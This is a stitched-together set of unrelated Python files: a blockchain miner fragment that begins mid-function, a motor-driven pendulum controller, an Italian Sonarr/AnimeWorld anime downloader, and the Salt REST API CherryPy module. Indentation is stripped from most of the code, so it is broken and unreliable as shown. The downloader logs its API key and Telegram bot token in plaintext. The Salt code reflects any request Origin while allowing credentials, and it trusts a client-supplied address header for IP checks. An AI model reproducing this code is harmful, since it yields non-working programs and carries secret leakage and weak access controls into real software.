while i < len(transactions) and size <= consts.MAX_BLOCK_SIZE_KB:
t = transactions[i]
mlist.append(t)
size += getsizeof(t.to_json())
i += 1
return mlist
def __mine(self, mempool: Set[Transaction], chain: Chain, wallet: Wallet) -> Block:
c_pool = list(copy.deepcopy(mempool))
mlist = self.__calculate_transactions(c_pool)
logger.debug(len(mlist))
block_header = BlockHeader(
version=consts.MINER_VERSION,
height=chain.length,
prev_block_hash=dhash(chain.header_list[-1]),
merkle_root=merkle_hash(mlist),
timestamp=int(time.time()),
signature="",
)
sign = wallet.sign(dhash(block_header))
block_header.signature = sign
block = Block(header=block_header, transactions=mlist)
r = requests.post("http://0.0.0.0:" + str(consts.MINER_SERVER_PORT) + "/newblock", data=compress(block.to_json()))
if r.text == "Block Received":
vjti_chain_relayer = VJTIChainRelayer(wallet)
vjti_chain_relayer.new_block(block)
logger.info(f"Miner: Mined Block with {len(mlist)} transaction(s)")
return block
else:
logger.info(f"Miner: Could not mine block with {len(mlist)} transaction(s)")
return None
|
__init__.py
|
from ....actuators.gyems import GyemsDRC
from ....sensors.can_sensors import CANSensors
from time import perf_counter, sleep
from math import pi
from multiprocessing import Process, Value, Event
from os import nice
class Pendulum:
""" This class provide interface to the Gyems BLDC motor driver over CAN socket"""
def __init__(
self,
can_bus=None,
device_id=0x141,
freq = 250,
):
self.actuator = {"motor": GyemsDRC(can_bus=can_bus, device_id=device_id),
"limit": 2000,
"angle_offset": 0,
"pos_offset": 0,
}
self.actuator["motor"].reset()
# print('test')
self.actuator["motor"].set_radians()
self.actuator["motor"].current_limit = self.actuator["limit"]
self.actuator["control"] = Value("d", 0)
self.actuator["torque_constant"] = 1
self.sensors_data = {}
self.state = {}
self.state_labels = {"time", "theta", "dtheta", "current", "torque", "temp"}
self.state = {}
for state in self.state_labels:
self.sensors_data[state] = Value("d", 0)
self.state[state] = 0
self.parameters = {}
self.to_home = True
self.T = 1/freq
# Array to store the processes
self.processes = []
self.exit_event = Event()
self.exit_event.clear()
def __del__(self):
self.stop()
print("Pendulum setup was deleted from memory")
def set_torque_constant(self, constant):
        # TODO: move this to the actuator class
self.actuator["torque_constant"] = constant
def run(self):
"""Run the sensing and motor processes"""
self.processes.append(
Process(target=self.motor_process, args=(self.exit_event,))
)
print("Processes are about to start...")
for process in self.processes:
process.start()
if self.exit_event.is_set():
print('test')
for process in self.processes:
process.join()
def enable(self):
self.actuator["motor"].enable()
def disable(self):
self.actuator["motor"].disable()
def stop(self, delay = 0.0):
sleep(delay)
print("Processes are about to stop...")
self.exit_event.set()
if self.processes:
for process in self.processes:
process.terminate()
print("Processes are terminated...")
def motor_process(self, exit_event):
print("Motor procces is launched")
self.actuator["motor"].enable()
try:
t0 = perf_counter()
tc = 0
while True:
t = perf_counter() - t0
if (t - tc)>=self.T:
tc = t
u = self.actuator["control"].value
self.actuator["motor"].set_current(u)
self.sensors_data["time"].value = t
self.sensors_data["theta"].value = (self.actuator["motor"].state["angle"] - self.actuator["angle_offset"])
self.sensors_data["dtheta"].value = self.actuator["motor"].state["speed"]
self.sensors_data["current"].value = self.actuator["motor"].state["torque"]
self.sensors_data["temp"].value = self.actuator["motor"].state["temp"]
# self.sensors_data["current"].value = self.actuator["motor"].state["torque"]
except KeyboardInterrupt:
if self.to_home:
self.to_zero()
self.actuator["motor"].disable()
exit_event.set()
print("Exit motor process")
def to_zero(self):
while abs(self.actuator["motor"].state["angle"])>0.05:
self.actuator["motor"].set_angle(0, speed_limit = 200)
# sleep(0.5)
pass
def get_state(self):
for state in self.state_labels:
self.state[state] = self.sensors_data[state].value
return self.state
def set_control(self, control):
"""Update the value for controller with arguments"""
# TODO: think on what is appropriate argument
# for actuator in self.actuators_labels:
self.actuator["control"].value = control
|
main.py
|
#!/usr/bin/python3
import animeworld as aw
import requests
import os, re, json
from copy import deepcopy
import schedule
import time
import threading
import shutil
import logging.config
from app import app, ReadSettings
SETTINGS = ReadSettings()
SONARR_URL = os.getenv('SONARR_URL')  # Sonarr IP address + port
API_KEY = os.getenv('API_KEY')  # Sonarr API key
CHAT_ID = os.getenv('CHAT_ID')  # Telegram chat ID
BOT_TOKEN = os.getenv('BOT_TOKEN')  # Telegram bot token
SCHEDULE_MINUTES = SETTINGS["ScanDalay"]  # Scan repeat interval (minutes)
WARNC='\033[93m'  # YELLOW
ALERTC='\033[91m'  # RED
ERRORC='\033[4;3;91m'  # RED
TITLEC='\033[1;94m'  # BLUE
SEPARC='\033[90m'  # GRAY
DIVIDC='\033[1;90m'  # GRAY
OKC='\033[92m'  # GREEN
NC='\033[0m'  # Reset
start = r"""{color}┌------------------------------------{time}------------------------------------┐
{color}| _ _____ _ _ |
{color}| /\ (_) | __ \ | | | | |
{color}| / \ _ __ _ _ __ ___ ___| | | | _____ ___ __ | | ___ __ _ __| | ___ _ __ |
{color}| / /\ \ | '_ \| | '_ ` _ \ / _ \ | | |/ _ \ \ /\ / / '_ \| |/ _ \ / _` |/ _` |/ _ \ '__| |
{color}| / ____ \| | | | | | | | | | __/ |__| | (_) \ V V /| | | | | (_) | (_| | (_| | __/ | |
{color}| /_/ \_\_| |_|_|_| |_| |_|\___|_____/ \___/ \_/\_/ |_| |_|_|\___/ \__,_|\__,_|\___|_| |
{color}| |
{color}└--------------------------------------------------------------------------------------------┘{nc}
""".format(time=time.strftime('%d %b %Y %H:%M:%S'), color=TITLEC, nc=NC)
def main():
LoadLog()
logging.warning(start)
if SONARR_URL is None:
logging.warning("✖️ Variabile d'ambinete '𝙎𝙊𝙉𝘼𝙍𝙍_𝙐𝙍𝙇' non inserita.")
else:
logging.info("✔ 𝙎𝙊𝙉𝘼𝙍𝙍_𝙐𝙍𝙇: {}".format(SONARR_URL))
if API_KEY is None:
logging.warning("✖️ Variabile d'ambinete '𝘼𝙋𝙄_𝙆𝙀𝙔' non inserita.")
else:
logging.info("✔ 𝘼𝙋𝙄_𝙆𝙀𝙔: {}".format(API_KEY))
if CHAT_ID is None:
logging.debug("✖️ Variabile d'ambinete '𝘾𝙃𝘼𝙏_𝙄𝘿' non inserita.")
else:
logging.info("✔ 𝘾𝙃𝘼𝙏_𝙄𝘿: {}".format(CHAT_ID))
if BOT_TOKEN is None:
logging.debug("✖️ Variabile d'ambinete '𝘽𝙊𝙏_𝙏𝙊𝙆𝙀𝙉' non inserita.")
else:
logging.info("✔ 𝘽𝙊𝙏_𝙏𝙊𝙆𝙀𝙉: {}".format(BOT_TOKEN))
if None not in (SONARR_URL, API_KEY):
logging.info(f"\n{OKC}☑️ Le variabili d'ambiente sono state inserite correttamente.{NC}\n")
logging.info(f"\n⚙️ Intervallo Scan: {SCHEDULE_MINUTES} minuti\n")
logging.info("\nAVVIO SERVER")
job_thread = threading.Thread(target=server)
job_thread.start()
        job()  # Run once immediately, then set up the periodic repetition
schedule.every(SCHEDULE_MINUTES).minutes.do(job)
def server():
os.system("gunicorn -w 2 --bind 0.0.0.0:5000 app:app > /dev/null 2>&1")
def run_threaded(job_func):
job_thread = threading.Thread(target=job_func)
job_thread.start()
def job():
divider = f"{DIVIDC}- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - {NC}"
logging.warning("\n{color}╭-----------------------------------「{time}」-----------------------------------╮{nc}\n".format(time=time.strftime("%d %b %Y %H:%M:%S"), color=SEPARC, nc=NC))
try:
raw_series = get_missing_episodes()
if len(raw_series)!=0:
series = converting(raw_series)
for info in series:
logging.warning(f"\n{divider}")
try:
logging.warning("🔎 Ricerca anime '{}' per l'episodio S{}E{}.".format(info["SonarrTitle"], info["season"], info["rawEpisode"]))
anime = [aw.Anime(link=x) for x in info["AnimeWorldLinks"]]
logging.info("🔎 Ricerca degli episodi per '{}'.".format(info["SonarrTitle"]))
                    epsArr = [x.getEpisodes() for x in anime]  # episode lists to merge
episodi = fixEps(epsArr)
logging.info("⚙️ Verifica se l'episodio 𝐒{}𝐄{} è disponibile.".format(info["season"], info["rawEpisode"]))
ep = None
for episodio in episodi:
if episodio.number == str(info["episode"]):
ep = episodio
logging.info("✔️ L'episodio è disponibile.")
break
else:
logging.info("✖️ L'episodio NON è ancora uscito.")
                    if ep is not None:  # If the episode is available
logging.warning("⏳ Download episodio 𝐒{}𝐄{}.".format(info["season"], info["rawEpisode"]))
title = f'{info["SonarrTitle"]} - S{info["season"]}E{info["rawEpisode"]}'
if ep.number == str(info["episode"]):
fileLink = ep.links[0]
title = fileLink.sanitize(title) # Sanitizza il titolo
if fileLink.download(title):
logging.info("✔️ Dowload Completato.")
if SETTINGS["MoveEp"]:
logging.info("⏳ Spostamento episodio 𝐒{}𝐄{} in {}.".format(info["season"], info["rawEpisode"], info["path"]))
if move_file(title, info["path"]):
logging.info("✔️ Episodio spostato.")
logging.info("⏳ Ricaricando la serie '{}'.".format(info["SonarrTitle"]))
RescanSerie(info["IDs"]["seriesId"])
if SETTINGS["RenameEp"]:
logging.info("⏳ Rinominando l'episodio.")
for i in range(5): # Fa 5 tentativi
try:
time.sleep(1)
epFileId = GetEpisodeFileID(info["IDs"]["epId"])
except KeyError:
continue
else:
RenameEpisode(info["IDs"]["seriesId"], epFileId)
break
else:
logging.warning(f"⚠️ NON è stato possibile rinominare l'episodio.")
if None not in (CHAT_ID, BOT_TOKEN):
logging.info("✉️ Inviando il messaggio via telegram.")
send_message(info)
except requests.exceptions.RequestException as res_error:
logging.warning(f"⚠️ Errore di connessione. ({res_error})")
except aw.AnimeNotAvailable as info:
logging.warning(f"⚠️ {info}")
except aw.ServerNotSupported as warning:
logging.error(f"{WARNC}🆆🅰🆁🅽🅸🅽🅶: {warning}{NC}")
except aw.DeprecatedLibrary as dev:
logging.critical(f"{ALERTC}🅰🅻🅴🆁🆃: {dev}{NC}")
finally:
logging.warning(f"\n{divider}")
else:
logging.info("\nNon c'è nessun episodio da cercare.\n")
except requests.exceptions.RequestException as res_error:
logging.error(f"🆆🅰🆁🅽🅸🅽🅶: Errore di connessione. ({res_error})")
except Exception as error:
logging.exception(f"{ERRORC}🅴🆁🆁🅾🆁: {error}{NC}")
nextStart = time.strftime("%d %b %Y %H:%M:%S", time.localtime(time.time() + SCHEDULE_MINUTES*60))
logging.warning("\n{color}╰-----------------------------------「{time}」-----------------------------------╯{nc}\n".format(time=nextStart, color=SEPARC, nc=NC))
def fixEps(epsArr):  # merges two or more AnimeWorld series
    up = 0  # offset added to keep episode numbers consecutive across seasons
    ret = []
    for eps in epsArr:
        for ep in eps:
            if re.search(r'^\d+$', ep.number) is not None:  # whole episode number
                ep.number = str(int(ep.number) + up)
                ret.append(ep)
            if re.search(r'^\d+\.\d+$', ep.number) is not None:  # fractional episode number
                continue  # skip it, it is almost certainly a special
            if re.search(r'^\d+-\d+$', ep.number) is not None:  # double episode
                ep1 = deepcopy(ep)  # duplicate the episode; this handling should be cleaned up
                ep2 = deepcopy(ep)  # not ideal
                ep1.number = str(int(ep.number.split('-')[0]) + up)
                ep2.number = str(int(ep.number.split('-')[1]) + up)
                ret.extend([ep1, ep2])
        up += int(eps[-1].number)
    return ret
def converting(series):
json_location = "/script/json/table.json"
if not os.path.exists(json_location):
logging.warning("⚠️ Il file table.json non esiste, quindi verrà creato.")
with open(json_location, 'w') as f:
f.write("[]")
try:
f = open(json_location, 'r')
table = json.loads(f.read())
f.close()
res = []
for anime in series:
for row in table:
if row["title"] == anime["SonarrTitle"]:
if row["absolute"]:
tmp = int(anime["episode"])
anime["episode"] = int(anime["rawEpisode"])
anime["rawEpisode"] = tmp
anime["AnimeWorldLinks"] = list(row["seasons"]["absolute"])
res.append(anime)
break
elif str(anime["season"]) in row["seasons"].keys():
anime["rawEpisode"] = int(anime["episode"])
anime["AnimeWorldLinks"] = list(row["seasons"][str(anime["season"])])
res.append(anime)
break
else:
logging.debug("❌ La 𝘴𝘵𝘢𝘨𝘪𝘰𝘯𝘦 {} della 𝘴𝘦𝘳𝘪𝘦 '{}' non esiste nella 𝗧𝗮𝗯𝗲𝗹𝗹𝗮 𝗗𝗶 𝗖𝗼𝗻𝘃𝗲𝗿𝘀𝗶𝗼𝗻𝗲.".format(anime["season"], anime["SonarrTitle"]))
except (json.decoder.JSONDecodeError, KeyError):
raise TableFormattingError
return res
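# Illustrative layout of /script/json/table.json as read by converting()
# (the titles and links are placeholders):
#
# [
#     {
#         "title": "<Sonarr series title>",
#         "absolute": false,
#         "seasons": {
#             "1": ["<AnimeWorld link for season 1>"],
#             "absolute": ["<AnimeWorld link for the absolutely-numbered listing>"]
#         }
#     }
# ]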
def move_file(title, path):
file = title
if os.path.isfile(file+'.mp4'):
file = file + '.mp4'
elif os.path.isfile(file+'.mkv'):
file = file + '.mkv'
else:
return False
# destinationPath = os.fspath(path)
path = path.replace('\\', '/')
destinationPath = re.sub(r"\w:", "", path)
currentPath = os.getcwd()
source = os.path.join(currentPath, file)
destination = os.path.join(destinationPath, file)
if not os.path.exists(destinationPath):
os.makedirs(destinationPath)
logging.warning(f"⚠️ La cartella {destinationPath} è stata creata.")
shutil.move(source, destination)
return True
#### Sonarr ############################################################################################################
def get_missing_episodes():
series = []
endpoint = "wanted/missing"
page = 0
error_attempt = 0
while True:
try:
page += 1
res = requests.get("{}/api/{}?apikey={}&sortKey=airDateUtc&page={}".format(SONARR_URL, endpoint, API_KEY, page))
result = res.json()
# f = open("res.json", 'w')
# f.write(json.dumps(result, indent=4))
# f.close()
if len(result["records"]) == 0:
break
for serie in result["records"]:
try:
info = {}
info["IDs"] = {
"seriesId": serie["seriesId"],
"epId": serie["id"]
}
info["seriesId"] = serie["seriesId"]
info["SonarrTitle"] = serie["series"]["title"]
info["AnimeWorldLinks"] = [] # season 1 di sonarr corrisponde a più season di AnimeWorld
info["season"] = int(serie["seasonNumber"])
info["episode"] = int(serie["episodeNumber"])
info["rawEpisode"] = int(serie["absoluteEpisodeNumber"])
info["episodeTitle"] = serie["title"]
info["path"] = serie["series"]["path"]
except KeyError:
logging.debug("⁉️ Serie '{}' S{} scartata per mancanza di informazioni.".format(serie["series"]["title"], serie["seasonNumber"]))
else:
series.append(info)
except requests.exceptions.RequestException as res_error:
if error_attempt > 3: raise res_error
error_attempt += 1
logging.warning(f"⚠️ Errore di connessione, prossimo tentativo fra 10s. ({res_error})")
time.sleep(10)
return series
def RescanSerie(seriesId):
endpoint = "command"
url = "{}/api/{}?apikey={}".format(SONARR_URL, endpoint, API_KEY)
data = {
"name": "RescanSeries",
"seriesId": seriesId
}
requests.post(url, json=data)
def RenameSerie(seriesId):
endpoint = "command"
url = "{}/api/{}?apikey={}".format(SONARR_URL, endpoint, API_KEY)
data = {
"name": "RenameSeries",
"seriesIds": [seriesId]
}
requests.post(url, json=data)
def GetEpisode(epId):
endpoint = f"episode/{epId}"
url = "{}/api/{}?apikey={}".format(SONARR_URL, endpoint, API_KEY)
return requests.get(url)
def GetEpisodeFile(epFileId):
endpoint = f"episodefile/{epFileId}"
url = "{}/api/{}?apikey={}".format(SONARR_URL, endpoint, API_KEY)
return requests.get(url)
def RenameEpisode(seriesId, epFileId):
endpoint = "command"
url = "{}/api/{}?apikey={}".format(SONARR_URL, endpoint, API_KEY)
data = {
"name": "RenameFiles",
"seriesId": seriesId,
"files": [epFileId]
}
return requests.post(url, json=data)
### UTILS
def GetEpisodeFileID(epId):  # Converts an epId into an epFileId
data = GetEpisode(epId).json()
return data["episodeFile"]["id"]
### LOG
def LoadLog():
logging.basicConfig(format='%(message)s')
logging.config.dictConfig({ 'version': 1, 'disable_existing_loggers': True, })
SetLog()
def SetLog():
LogLevel = SETTINGS["LogLevel"]
logging.getLogger().setLevel(LogLevel)
#### Telegram ###########################################################################################################
def send_message(info):
text = "*Episode Downloaded*\n{title} - {season}x{episode} - {episodeTitle}".format(title=info["SonarrTitle"], season=str(info["season"]), episode=str(info["episode"]), episodeTitle=info["episodeTitle"])
url ="https://api.telegram.org/bot{}/sendMessage?text={}&chat_id={}&parse_mode=Markdown".format(BOT_TOKEN, text, CHAT_ID)
requests.get(url)
if __name__ == '__main__':
main()
while True:
schedule.run_pending()
time.sleep(1)
### FLASK #######################
### ERRORS ####################################
# Problem with the formatting of the table.json file
class TableFormattingError(Exception):
def __init__(self):
self.message = "Errore al file table.json"
super().__init__(self.message)
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. versionadded:: 2014.7.0
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
:depends: - CherryPy Python module
- salt-api package
:optdepends: - ws4py Python module for websockets support.
:configuration: All authentication is done through Salt's :ref:`external auth
<acl-eauth>` system which requires additional configuration not described
here.
Example production-ready configuration; add to the Salt master config file:
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
Using only a secure HTTPS connection is strongly recommended since Salt
authentication credentials will be sent over the wire.
A self-signed certificate can be generated using the
:py:func:`~salt.modules.tls.create_self_signed_cert` function in Salt (note
the dependencies for this module).
.. code-block:: bash
salt-call tls.create_self_signed_cert
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
ssl_crt
    The path to an SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
app
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
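For example, a fuller configuration combining several of the options above
might look like the following (the values shown are illustrative, not
recommendations):

.. code-block:: yaml

    rest_cherrypy:
        port: 8000
        host: 0.0.0.0
        debug: False
        ssl_crt: /etc/pki/tls/certs/localhost.crt
        ssl_key: /etc/pki/tls/certs/localhost.key
        thread_pool: 100
        socket_queue_size: 30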
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways:
* Include a custom header named :mailheader:`X-Auth-Token`.
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
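For example, a token obtained from :py:class:`Login` can be replayed on later
requests via the :mailheader:`X-Auth-Token` header (the hostname, credentials,
and token below are placeholders):

.. code-block:: bash

    # Obtain a session token
    curl -si localhost:8000/login \\
        -d username='saltuser' \\
        -d password='saltpass' \\
        -d eauth='pam'

    # Send the returned token with subsequent requests
    curl -si localhost:8000/minions -H 'X-Auth-Token: 6d1b722e'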
.. seealso:: You can bypass the session handling via the :py:class:`Run` URL.
Usage
-----
Commands are sent to a running Salt master via this module by sending HTTP
requests to the URLs detailed below.
.. admonition:: Content negotiation
This REST interface is flexible in what data formats it will accept as well
as what formats it will return (e.g., JSON, YAML, x-www-form-urlencoded).
* Specify the format of data in the request body by including the
:mailheader:`Content-Type` header.
* Specify the desired data format for the response body with the
:mailheader:`Accept` header.
Data sent in :http:method:`post` and :http:method:`put` requests must be in
the format of a list of lowstate dictionaries. This allows multiple commands to
be executed in a single HTTP request.
.. glossary::
lowstate
A dictionary containing various keys that instruct Salt which command
to run, where that command lives, any parameters for that command, any
authentication credentials, what returner to use, etc.
Salt uses the lowstate data format internally in many places to pass
command data between functions. Salt also uses lowstate for the
:ref:`LocalClient() <python-api>` Python API interface.
The following example (in JSON format) causes Salt to execute two commands::
[{
"client": "local",
"tgt": "*",
"fun": "test.fib",
"arg": ["10"]
},
{
"client": "runner",
"fun": "jobs.lookup_jid",
"jid": "20130603122505459265"
}]
.. admonition:: x-www-form-urlencoded
Sending JSON or YAML in the request body is simple and most flexible,
however sending data in urlencoded format is also supported with the
caveats below. It is the default format for HTML forms, many JavaScript
libraries, and the :command:`curl` command.
For example, the equivalent to running ``salt '*' test.ping`` is sending
``fun=test.ping&arg&client=local&tgt=*`` in the HTTP request body.
Caveats:
* Only a single command may be sent per HTTP request.
* Repeating the ``arg`` parameter multiple times will cause those
parameters to be combined into a single list.
Note, some popular frameworks and languages (notably jQuery, PHP, and
Ruby on Rails) will automatically append empty brackets onto repeated
parameters. E.g., ``arg=one``, ``arg=two`` will be sent as ``arg[]=one``,
``arg[]=two``. This is not supported; send JSON or YAML instead.
.. |req_token| replace:: a session token from :py:class:`~Login`.
.. |req_accept| replace:: the desired response format.
.. |req_ct| replace:: the format of the request body.
.. |res_ct| replace:: the format of the response body; depends on the
:mailheader:`Accept` request header.
.. |200| replace:: success
.. |401| replace:: authentication required
.. |406| replace:: requested Content-Type not available
'''
# We need a custom pylintrc here...
# pylint: disable=W0212,E1101,C0103,R0201,W0221,W0613
from __future__ import absolute_import
# Import Python libs
import collections
import itertools
import functools
import logging
import json
import StringIO
import tarfile
import time
from multiprocessing import Process, Pipe
# Import third-party libs
import cherrypy
from cherrypy.lib import cpstats
import yaml
# Import Salt libs
import salt
import salt.auth
import salt.utils.event
# Import salt-api libs
import salt.netapi
logger = logging.getLogger(__name__)
# Imports related to websocket
try:
from .tools import websockets
from . import event_processor
HAS_WEBSOCKETS = True
except ImportError:
websockets = type('websockets', (object,), {
'SynchronizingWebsocket': None,
})
HAS_WEBSOCKETS = False
def salt_token_tool():
'''
If the custom authentication header is supplied, put it in the cookie dict
so the rest of the session-based auth works as intended
'''
x_auth = cherrypy.request.headers.get('X-Auth-Token', None)
# X-Auth-Token header trumps session cookie
if x_auth:
cherrypy.request.cookie['session_id'] = x_auth
def salt_ip_verify_tool():
'''
If there is a list of restricted IPs, verify current
client is coming from one of those IPs.
'''
# This is overly cumbersome and crude,
# But, it's also safe... ish...
salt_config = cherrypy.config.get('saltopts', None)
if salt_config:
cherrypy_conf = salt_config.get('rest_cherrypy', None)
if cherrypy_conf:
auth_ip_list = cherrypy_conf.get('authorized_ips', None)
if auth_ip_list:
logger.debug("Found IP list: {0}".format(auth_ip_list))
rem_ip = cherrypy.request.headers.get('Remote-Addr', None)
logger.debug("Request from IP: {0}".format(rem_ip))
if rem_ip not in auth_ip_list:
logger.error("Blocked IP: {0}".format(rem_ip))
cherrypy.response.status = 403
return {
'status': cherrypy.response.status,
'return': "Bad IP",
}
def salt_auth_tool():
'''
Redirect all unauthenticated requests to the login page
'''
# Redirect to the login page if the session hasn't been authed
if 'token' not in cherrypy.session: # pylint: disable=W8601
raise cherrypy.HTTPError(401)
# Session is authenticated; inform caches
cherrypy.response.headers['Cache-Control'] = 'private'
def cors_handler(*args, **kwargs):
'''
Check a CORS preflight request and return a valid response
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
ac_method = req_head.get('Access-Control-Request-Method', None)
allowed_methods = ['GET', 'POST']
allowed_headers = ['X-Auth-Token', 'Content-Type']
if ac_method and ac_method in allowed_methods:
resp_head['Access-Control-Allow-Methods'] = ', '.join(allowed_methods)
resp_head['Access-Control-Allow-Headers'] = ', '.join(allowed_headers)
resp_head['Connection'] = 'keep-alive'
resp_head['Access-Control-Max-Age'] = '1400'
return {}
def cors_tool():
'''
Handle both simple and complex CORS requests
Add CORS headers to each response. If the request is a CORS preflight
request swap out the default handler with a simple, single-purpose handler
that verifies the request and provides a valid CORS response.
'''
req_head = cherrypy.request.headers
resp_head = cherrypy.response.headers
# Always set response headers necessary for 'simple' CORS.
resp_head['Access-Control-Allow-Origin'] = req_head.get('Origin', '*')
resp_head['Access-Control-Expose-Headers'] = 'GET, POST'
resp_head['Access-Control-Allow-Credentials'] = 'true'
# If this is a non-simple CORS preflight request swap out the handler.
if cherrypy.request.method == 'OPTIONS':
cherrypy.serving.request.handler = cors_handler
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
('application/json', json.dumps),
('application/x-yaml', functools.partial(
yaml.safe_dump, default_flow_style=False)),
)
def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except cherrypy.CherryPyException:
raise
except Exception as exc:
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
'return': '{0}'.format(traceback.format_exc(exc))
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
return out(ret)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
request.handler = hypermedia_handler
def process_request_body(fn):
    '''
    A decorator to skip a processor function if process_request_body is False
    '''
    @functools.wraps(fn)
    def wrapped(*args, **kwargs):  # pylint: disable=C0111
        if cherrypy.request.process_request_body is not False:
            fn(*args, **kwargs)
    return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
body = entity.fp.read()
try:
cherrypy.serving.request.unserialized_data = json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if not isinstance(data, list):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource',
salt_token_tool, priority=55)
cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body',
salt_auth_tool, priority=60)
cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body',
hypermedia_in)
cherrypy.tools.cors_tool = cherrypy.Tool('before_handler',
cors_tool, priority=30)
cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler',
lowdata_fmt, priority=40)
cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler',
hypermedia_out)
